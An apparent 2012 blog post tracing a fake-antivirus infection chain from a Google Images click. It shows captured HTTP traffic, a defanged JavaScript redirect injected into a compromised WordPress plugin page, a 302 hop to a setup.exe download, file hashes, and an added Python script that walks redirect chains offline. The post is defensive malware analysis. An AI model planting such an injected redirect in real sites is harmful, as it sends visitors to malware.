It was a simple search. Nothing more. I was looking for a picture of Dr. Sheldon Cooper from The Big Bang Theory. I go to Google Images and I (thought) I found such a nice one. I click on the thumbnail and suddenly this popped up (in a browser window):
Me thinks the browser doth protest too much.... looks like we have a FakeAV on our hands. Quick-- to the VM!
So I fire up my Windows XP image and start CaptureBAT on it. I go right back to the same image I went to before and click it, and kerpow, the same website (kxxxxdefend.info/68efd410a6a48b3c/2/) with the 'Potential Security Alerts' pops up. This time though I download the executable, which is 'setup.exe'.
Now wait a darn tootin minute here... how did we get to this other site? What happened to the original domain I requested (which I censored to protect the innocent)? Well this TCP dump could help shed some light.
Request:

```http
GET /wp-content/plugins/slickr-flickr/sheldon-wallpaper HTTP/1.1
Host: xxxxxxxx.xxx
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.106 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: hxxp://www.google.co.uk/imgres?q=sheldon+cooper&hl=en&biw=1040&bih=768&gbv=2&tbm=isch&tbnid=Jccw2M05I0r6bM:&imgrefurl=hxxp://xxxxxxxx.xxx/wp-content/plugins/slickr-flickr/sheldon-wallpaper&docid=qrYUJpskfIVYMM&imgurl=hxxp://xxxxxxxx.xxx/wp-content/plugins/slickr-flickr/sheldon-wallpaper.jpg&w=1024&h=824&ei=jxN7T82RNsG_0QXY9724CQ&zoom=1&iact=hc&vpx=508&vpy=358&dur=34125&hovh=201&hovw=250&tx=101&ty=191&sig=107143226035704011362&page=2&tbnh=135&tbnw=166&start=26&ndsp=29&ved=1t:429,r:14,s:26
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
```

Response:

```http
HTTP/1.1 200 OK
Date: Tue, 03 Apr 2012 15:14:07 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6.3 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.32 mod_perl/2.0.5 Perl/v5.8.8
X-Powered-By: PHP/5.3.8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

9f
script var url = "hxxp://kxxxxdefend.info/68efd410a6a48b3c/2/"; if (window!=top) {top.location.href = url;} else { document.location= url;} /script
0
```
I actually had to remove the '<' and '>' else Google nicely tried to execute the script.... how thoughtful of them....
So I highlighted the interesting stuff in bold. Slickr-Flickr is a plugin which allows a user to easily display Flickr photos in your blog. Cool. The script code confirms that something definitely happened to this guy's site. Someone was able to upload a malicious redirect via (probably? I am not the best websec chick) the plugin or WordPress itself. Regardless... not cool man-- to Malzilla!
So browsing via Malzilla shows us the code for the page we saw earlier:
So again I tried to highlight the good bits (I added the Moose text... ). We see a popup saying your computer is infected... no matter what you do, it calls the function 'al'... which gets us the ol' familiar warning of impending doom on your computer. It basically says that in the coordinates that happen to be over the 'Clean Computer' button, go to the download page. If you try to click the 'X' box, the function al is called again. Anyways let's point Mozilla to the 'download' page and see what happens.....
OMG! Another redirect! This is getting silly don't you think? Luckily as we can see this is the end... and we get our setup.exe. Look quickly again at the response we received when going to the download page:
```http
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Tue, 03 Apr 2012 16:22:37 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: hxxp://dxxxxdebug.info/68efd410a6a48b3c/2/setup.exe
```
So we got to the 'download' page only to be pushed somewhere else. Info about the file:
- Name: setup.exe
- MD5: 22D7CF7B0591E8C9688769D5F502DDF4
- SHA: 1b9c0e6709b163e918477711c384705a8ef28eea776d58b86f49a98998ae8595
- Size: 2187394 bytes
- What VirusTotal says: 5/42 AVs say it's bad. Report here.
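An added Python example (mine, not the author's code or a capture from this post) that walks a redirect chain like the one above offline, so nothing in the captured pages ever runs: it decodes the chunked body, pulls the target out of an injected `var url ... location` script, follows a 302 Location header, and stops at a final hop or a loop bound. The two sample responses are constructed from what the post shows, with the FakeAV page and its 'download' page collapsed into one 302 hop.

```python
import re
# Constructed samples (not the post's own capture) of its two hops; URLs kept defanged (hxxp).
INJECTED = (b'<script> var url = "hxxp://kxxxxdefend.info/68efd410a6a48b3c/2/"; '
            b'if (window!=top) {top.location.href = url;} else { document.location= url;} </script>')
HOP1 = (b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n\r\n"
        b"%x\r\n%s\r\n0\r\n\r\n" % (len(INJECTED), INJECTED))        # chunk size is hex, like the 9f above
HOP2 = b"HTTP/1.1 302 Moved Temporarily\r\nLocation: hxxp://dxxxxdebug.info/68efd410a6a48b3c/2/setup.exe\r\n\r\n"

def decode_chunked(data):
    """Reassemble a chunked body: hex size line, chunk bytes, CRLF, ..., a '0' terminator."""
    out = bytearray()
    while True:
        size_line, _, data = data.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)        # ignore any chunk extension
        if size == 0:
            return bytes(out)
        out += data[:size]
        data = data[size + 2:]                          # skip the chunk and its CRLF

def parse_response(raw):
    """Split a raw HTTP/1.1 response into (status, lower-cased header dict, body text)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("latin-1").split("\r\n")
    headers = {k.strip().lower(): v.strip() for k, _, v in (h.partition(":") for h in header_lines)}
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = decode_chunked(body)
    return int(status_line.split()[1]), headers, body.decode("latin-1", "replace")

# `var url = "..."` plus any top/document/window.location(.href) assignment, as in the injected script
JS_URL_VAR = re.compile(r'var\s+(\w+)\s*=\s*["\']([^"\']+)["\']')
JS_LOCATION = re.compile(r'(?:top|document|window)\.location(?:\.href)?\s*=\s*(["\']?)([^;"\']+)\1')
def next_hop(status, headers, body):
    """Where this response sends the browser next: a 3xx Location, a JS redirect target, or None."""
    if 300 <= status < 400 and "location" in headers:
        return headers["location"]
    m = JS_LOCATION.search(body) if "text/html" in headers.get("content-type", "") else None
    if m is None:
        return None
    target = m.group(2).strip()
    return dict(JS_URL_VAR.findall(body)).get(target, target)   # resolve `url` variable, else literal

def redirect_chain(responses, start, limit=10):
    """Walk captured responses offline, never executing script; `limit` bounds redirect loops."""
    chain = [start]
    while chain[-1] in responses and len(chain) < limit:
        nxt = next_hop(*parse_response(responses[chain[-1]]))
        if nxt is None:
            break
        chain.append(nxt)
    return chain
```

Feed `redirect_chain` a dict of URL to raw response bytes (from a pcap or proxy log) and it returns the hop list, ending at the URL that served setup.exe.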
As Dr. Cooper would say: BAZINGA



1 comment:
Pretty scary that at the time of writing only 5/42 found it (it's now 6/42).
Shows why users really need to protect themselves in an active way and only rely on AV for the low hanging fruit.
I often have Fiddler running in the background as I browse, just in case something like this happens so I can quickly track down the source.